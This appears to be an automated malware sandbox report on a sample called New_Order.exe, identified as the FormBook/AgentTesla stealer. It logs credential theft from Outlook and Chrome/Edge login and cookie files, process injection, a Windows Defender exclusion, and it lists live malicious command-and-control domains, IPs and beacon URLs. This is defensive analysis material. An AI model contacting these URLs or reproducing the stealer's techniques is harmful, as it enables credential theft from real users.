            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeQueries volume information: C:\Users\user\AppData\Roaming\QjSljS.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\wextract.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.New_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4164625509.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166864709.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4168479789.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4166481175.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1853449511.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1910322852.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.1910549824.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4166642046.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4166636409.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1865768536.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth3
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration4
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication4
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
            Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1352630 Sample: New_Order.exe Startdate: 03/12/2023 Architecture: WINDOWS Score: 100 60 www.pay4dance.xyz 2->60 62 www.wrautomotive.online 2->62 64 12 other IPs or domains 2->64 74 Snort IDS alert for network traffic 2->74 76 Multi AV Scanner detection for domain / URL 2->76 78 Malicious sample detected (through community Yara rule) 2->78 82 8 other signatures 2->82 10 New_Order.exe 7 2->10         started        14 QjSljS.exe 5 2->14         started        signatures3 80 Performs DNS queries to domains with low reputation 60->80 process4 file5 56 C:\Users\user\AppData\Roaming\QjSljS.exe, PE32 10->56 dropped 58 C:\Users\user\AppData\Local\...\tmpBC11.tmp, XML 10->58 dropped 86 Uses schtasks.exe or at.exe to add and modify task schedules 10->86 88 Adds a directory exclusion to Windows Defender 10->88 90 Injects a PE file into a foreign processes 10->90 16 New_Order.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        31 3 other processes 10->31 92 Multi AV Scanner detection for dropped file 14->92 94 Machine Learning detection for dropped file 14->94 23 QjSljS.exe 14->23         started        25 schtasks.exe 1 14->25         started        27 QjSljS.exe 14->27         started        29 QjSljS.exe 14->29         started        signatures6 process7 signatures8 72 Maps a DLL or memory area into another process 16->72 33 MxIFbOJlQLdXkFqAx.exe 16->33 injected 35 conhost.exe 19->35         started        37 conhost.exe 21->37         started        39 MxIFbOJlQLdXkFqAx.exe 23->39 injected 42 conhost.exe 25->42         started        44 conhost.exe 31->44         started        process9 signatures10 46 wextract.exe 33->46         started        84 Maps a DLL or memory area into another process 39->84 49 wextract.exe 39->49         started        process11 signatures12 96 Tries to steal Mail credentials (via file / registry access) 46->96 98 Tries to harvest and steal browser information (history, passwords, etc) 46->98 100 Writes to foreign memory regions 46->100 102 3 other signatures 46->102 51 MxIFbOJlQLdXkFqAx.exe 46->51 injected 54 firefox.exe 46->54         started        process13 dnsIp14 66 www.quote2bill.com 185.151.30.138, 49740, 49741, 49743 TWENTYIGB United Kingdom 51->66 68 wrautomotive.online 37.97.254.27, 49757, 49758, 49759 TRANSIP-ASAmsterdamtheNetherlandsNL Netherlands 51->68 70 7 other IPs or domains 51->70

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            New_Order.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            New_Order.exe68%VirustotalBrowse
            New_Order.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\QjSljS.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\QjSljS.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            busan3-200.com1%VirustotalBrowse
            www.fdissolutions.net2%VirustotalBrowse
            wrautomotive.online8%VirustotalBrowse
            www.rssnewscast.com3%VirustotalBrowse
            www.quote2bill.com1%VirustotalBrowse
            www.wrautomotive.online1%VirustotalBrowse
            www.poria.link0%VirustotalBrowse
            www.kasegitai.tokyo0%VirustotalBrowse
            www.tongtu150.click2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://mozilla.org0/0%URL Reputationsafe
            http://www.fdissolutions.net/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=inoojyPYY1WC9wcQL3KibnMAdvhtstHROTevXGeSx6okq+Nf2nPGtK9KaHajuwb+0LfF1HdY3MAFMtPUKPMp3iU3/gDoogh+Wg==100%Avira URL Cloudmalware
            http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
            https://www.transip.eu/knowledgebase/zoeken/0%VirustotalBrowse
            http://www.poria.link/fdo5/?540H2x=xa2waNrdOCjpAmfef8jorByukH+EVFd5YbvOdmGsq1/UoTy2yLdiy8uLwcrb3pQUM2TyiZx+d9zg30LTCTeZqohwWyqWM8Qwrg==&fXUX=ShJ8DFcXvtj84pw100%Avira URL Cloudmalware
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            https://www.transip.eu/services/search-domains/0%Avira URL Cloudsafe
            https://www.transip.eu/knowledgebase/zoeken/0%Avira URL Cloudsafe
            http://www.quote2bill.com/fdo5/100%Avira URL Cloudmalware
            http://www.wrautomotive.online/fdo5/100%Avira URL Cloudmalware
            http://www.busan3-200.com/fdo5/100%Avira URL Cloudmalware
            http://www.poria.link/fdo5/100%Avira URL Cloudmalware
            http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
            https://www.transip.eu/question/110000577/0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo0%Avira URL Cloudsafe
            http://www.pay4dance.xyz/fdo5/?540H2x=5TdxL1jawfl3Ka3qvJ6r7WEnhl9d9FSMp+F3J8Z8WOIoZyaqSH32l6+4J8Kvi3fjVro4t5UeAoiyMZT16OgV/jIcRYbasIDnmQ==&fXUX=ShJ8DFcXvtj84pw100%Avira URL Cloudphishing
            http://www.busan3-200.com:80/fdo5/?fXUX=ShJ8DFcXvtj84pw&amp;540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaU100%Avira URL Cloudmalware
            http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
            https://www.transip.eu/question/110000576/0%Avira URL Cloudsafe
            https://transip.eu/cp/0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=65uPmj+z4VpNJqA9pxY4t334WX7Mhk7tiYzSNqqY5uLzfvAkeCdzENkJlXyLUTYzEELB4+YwfPYf7gdekS/nySqpdkWMB4I85w==0%Avira URL Cloudsafe
            https://transip.eu/0%Avira URL Cloudsafe
            https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/0%Avira URL Cloudsafe
            http://www.pay4dance.xyz/fdo5/100%Avira URL Cloudphishing
            http://www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw100%Avira URL Cloudmalware
            https://www.transip.eu/question/1000002300%Avira URL Cloudsafe
            http://www.quote2bill.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EAzFkHRwipdrFLRPzn8XfH22pTdKYWJnyl4LcH+flh+EU/cAs0/QFXMo9vl/d0UKRaBGjYTaeopZ/0cAzgqORqEzisMthiMtgw==100%Avira URL Cloudmalware
            http://www.founder.com.cn/cn0%Avira URL Cloudsafe
            https://www.transip.eu/privacy-policy/0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fdo5/0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EQwTHp3RZGFUPSUcH+83d++sEHXiHecksK53+uRoarOYzym5WINU/nAp376IAi0Fnc8MDGSrPwcAz9k7VILN2J3NqNX7kas5xg==0%Avira URL Cloudsafe
            http://www.busan3-200.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUHYHmevxRJiNXHXH1dMi1Tu8dx6k0Oesk6U+KD/q+MB1YEvRLC9XlweWTzImNrywBQ==100%Avira URL Cloudmalware
            https://www.transip.eu/terms-of-service/0%Avira URL Cloudsafe
            http://www.fdissolutions.net/fdo5/100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            busan3-200.com
            		52.68.224.126
            		truetrueunknown
            www.fdissolutions.net
            		109.68.33.25
            		truetrueunknown
            wrautomotive.online
            		37.97.254.27
            		truetrueunknown
            www.pay4dance.xyz
            		66.29.155.54
            		truetrue
              		unknown
              www.rssnewscast.com
              		91.195.240.94
              		truetrueunknown
              www.quote2bill.com
              		185.151.30.138
              		truetrueunknown
              www.poria.link
              		172.67.184.73
              		truetrueunknown
              www.waimaier2.store
              		43.154.179.176
              		truefalse
                		unknown
                www.kasegitai.tokyo
                		202.172.28.202
                		truetrueunknown
                www.wrautomotive.online
                		unknown
                		unknowntrueunknown
                www.busan3-200.com
                		unknown
                		unknowntrue
                  		unknown
                  www.kateandrae.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.pace-drive-coupons.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.tongtu150.click
                      		unknown
                      		unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.poria.link/fdo5/?540H2x=xa2waNrdOCjpAmfef8jorByukH+EVFd5YbvOdmGsq1/UoTy2yLdiy8uLwcrb3pQUM2TyiZx+d9zg30LTCTeZqohwWyqWM8Qwrg==&fXUX=ShJ8DFcXvtj84pwtrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.fdissolutions.net/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=inoojyPYY1WC9wcQL3KibnMAdvhtstHROTevXGeSx6okq+Nf2nPGtK9KaHajuwb+0LfF1HdY3MAFMtPUKPMp3iU3/gDoogh+Wg==true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.quote2bill.com/fdo5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.wrautomotive.online/fdo5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.busan3-200.com/fdo5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.poria.link/fdo5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.pay4dance.xyz/fdo5/?540H2x=5TdxL1jawfl3Ka3qvJ6r7WEnhl9d9FSMp+F3J8Z8WOIoZyaqSH32l6+4J8Kvi3fjVro4t5UeAoiyMZT16OgV/jIcRYbasIDnmQ==&fXUX=ShJ8DFcXvtj84pwtrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://www.rssnewscast.com/fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=65uPmj+z4VpNJqA9pxY4t334WX7Mhk7tiYzSNqqY5uLzfvAkeCdzENkJlXyLUTYzEELB4+YwfPYf7gdekS/nySqpdkWMB4I85w==true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.pay4dance.xyz/fdo5/true
                      • Avira URL Cloud: phishing
                      		unknown
